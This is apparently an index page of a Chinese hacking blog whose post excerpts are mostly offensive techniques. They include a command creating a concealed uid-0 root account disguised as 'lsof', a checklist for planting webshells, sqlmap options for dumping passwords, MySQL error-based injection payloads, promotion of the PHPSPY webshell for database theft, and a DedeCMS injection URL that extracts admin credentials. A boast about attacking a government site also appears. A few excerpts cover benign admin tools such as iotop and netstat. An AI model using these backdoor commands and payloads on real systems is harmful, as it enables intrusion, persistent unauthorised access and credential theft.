cn三少nginx

摘要： 内网机器提权添加账户，无回显，设置密码就不好弄，下面就是添加一个root级别的账户并设置密码的命令?1useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof命令解释useradd 添加用户-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码，里面的lsof差不多是密钥之类的，可以随便写， admin是明文密码-u 0 -o 添加一个uid为 阅读全文

摘要： 1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DBowner权限可以直接写shell；如果写不了，或者web与数据库分离，那就猜数据，从后台下手了，后台可以上传或者改配置文件；3.asp（aspx）+ACCESS拿shell一般只有3种方法，一是前台上传或者注入进后台上传；二是注入进后台改配置文件；三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句 阅读全文

摘要： -u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “”#指定数据库名-T “”#指定表名-C “”#指定字段-s “”#保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s “xx.log” 恢复:-s “xx.log” –resume)–columns #列出字段–current-user #获取当前用户名称–current-db #获取当前数据库名称–users #列数据库所有用户–passwords #数据库用户所有密码–privileges #查看用户权限(–privil 阅读全文

摘要： 什么是CC攻击?CC攻击就是利用大量代理服务器对目标计算机发起大量连接，导致目标服务器资源枯竭造成拒绝服务。那么如何判断查询CC攻击呢?本文主要介绍了一些Linux下判断CC攻击的命令。查看所有80端口的连接数netstat -nat|grep -i "80"|wc -l对连接的IP按连接数量进行排序netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nnetstat -ntu | awk '{print $5 阅读全文

摘要： MySql Error Based Injection Reference[Mysql暴错注入参考]Author:Pnig0s1992Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功小部分版本使用name_const()时会报错.可以用给出的Method.2测试查询版本:Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)Method.2:and+(SELECT+1+FROM+(select 阅读全文

摘要： 看了一个泰国政府的网站被伊朗的黑客挂页，上面写着“Your Box 0wn3z By Behrooz_Ice – Q7x -Sha2ow -Virangar -Ali_Eagle -iman_taktaz – Satanic2000”“We Love Iran”“Ashiyane Digital Security Team”这样的话云云。一些中国的傻逼还拿着别人的黑页去zone-h去提交，感觉受不了这么傻逼的事情，就跟着犯了傻逼，捅了人家的PP下面我就讲讲怎么捅了他们的PP(http://203.154.183.18/ash_hack.htm)作者：YoCo Smart来自：Silic Gro 阅读全文

摘要： 如果你知道有程序在磨你的硬盘，但是你又不能确定是哪一个程序在磨你的硬盘，那么就用 iotop来帮助你吧。在Ubuntu里安装命令是： sudo apt-get install iotop安装好之后在终端输入：iotop就可以了下面来说一具体运用：可以用左右箭头操作，按 r 是相反方向，按 o 是动态切换用法 iotop -参数–version 查看版本信息的-h, –help 查看帮助信息的-o, –only 只显示在划硬盘的程序-b, –batch 批量处理 用来记录日志的-n NUM 设定循环几次-d SEC, –delay=SEC 设定显示时间间隔 阅读全文

摘要： Google Hacking的含义原指利用Google Google搜索引擎搜索信息来进行入侵的技术和行为,现指利用各种搜索引擎搜索信息来进行入侵的技术和行为.Google Hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉Google Hacking其实并非如此简单。看论坛没人发google hacker之类的，我就发个吧。个人还是挺喜欢google,这个是不是完整版的我就不清楚了，然后这个也不是我翻 阅读全文

摘要： PHPSPY2013的功能主要还是以文件管理、数据库管理、执行命令、查看系统信息为主。目前改进如下。1.删除通过数据库上传、下载文件，因为这个功能需要连接数据库的用户拥有FILE权限，有一定的局限性，而且不常用。所以删除以达到缩小体积的目的。需要用的可以用PHPSPY2011。2.增强导出数据的兼容性。以方便拖库的同学。已经测试过两个不同语言不同编码的800万条数据的库。导出文件大小1G。 6分钟。无错导出并且能无错导入。并且能显示正确的编码文字。爽了。3.删除数据库的插入、编辑功能。这个功能当初是为了考虑数据库挂马方便。但是现在挂马的很少了。红客学院而且完全可以自己执行SQL语句来实现。所以 阅读全文

摘要： 首先：注入exp有时候 有些/plus/目录换成了/plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/plus/search.php?keyword=as&type 阅读全文